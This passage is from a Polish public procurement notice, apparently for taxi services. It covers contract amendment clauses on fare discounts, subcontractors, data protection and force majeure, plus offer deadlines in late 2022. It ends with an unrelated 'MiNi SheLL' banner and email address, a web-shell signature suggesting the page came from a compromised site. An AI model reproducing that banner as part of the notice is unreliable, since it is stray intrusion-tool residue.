początkowej oraz cen za 1 kilometr w poszczególnych taryfach nastąpi w każdej innej sytuacji, poza określonymi w ust. 2 pkt 1) oraz § 8 i 9. Rabat ma być dostosowany proporcjonalnie tak, by opłata początkowa i ceny za 1 kilometr w poszczególnych taryfach po rabacie nie były wyższe od cen pierwotnych, podanych w Załączniku nr 2 do Umowy. Zmiana wysokości rabatu będzie obowiązywać od dnia wprowadzenia nowego cennika, pod warunkiem, że na co najmniej 30 dni przed wprowadzeniem zmian Wykonawca powiadomi o tym fakcie Zamawiającego, <br/>4)	w zakresie podwykonawstwa – w przypadku, gdy składając ofertę Wykonawca zobowiązał się do samodzielnego wykonania przedmiotu Umowy, o którym mowa w § 1 ust. 1, a w okresie jego realizacji zaistnieje konieczność wykonania usług z udziałem Podwykonawcy – pod warunkiem, że Wykonawca niezwłocznie, nie później niż 7 dni od dnia zaistnienia ww. konieczności świadczenia usług z udziałem Podwykonawcy:<br/>a)	wykaże powody, dla których świadczenie usług wymaga udziału Podwykonawcy, <br/>b)	wskaże część przedmiotu Umowy, która zostanie przekazana Podwykonawcy do wykonania,<br/>c)	poda nazwy (firmy) Podwykonawcy,<br/>5)	przypadku zmiany Podwykonawców, wskazanych w § 6 ust. 3 pod warunkiem wskazania, nie później niż 7 dni kalendarzowych przed planowaną zmianą, powodu dla którego konieczna jest przedmiotowa zmiana oraz podania nazwy (firmy) Podwykonawcy.<br/>6)	w zakresie klauzul dotyczących ochrony danych osobowych – w przypadku zmiany stanu prawnego dotyczącego ochrony danych osobowych lub przetwarzania tych danych, w zakresie, w jakim zmiany te wpływać będą na treść klauzul zawartych w Umowie, w celu zapewnienia jej zgodności z przepisami prawa, <br/>7)	w przypadku wystąpienia w okresie realizacji Umowy, o którym mowa w § 2 ust. 1, zdarzeń Okoliczności Siły Wyższej innych niż wskazane w § 13, poprzez dostosowanie postanowień i warunków wykonania przedmiotu Umowy w zakresie i celu umożliwiającym wykonane Umowy w warunkach będący następstwem wystąpienia Okoliczności Siły Wyższej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformę, o której mowa Rozdziale IV.1 SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-30 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com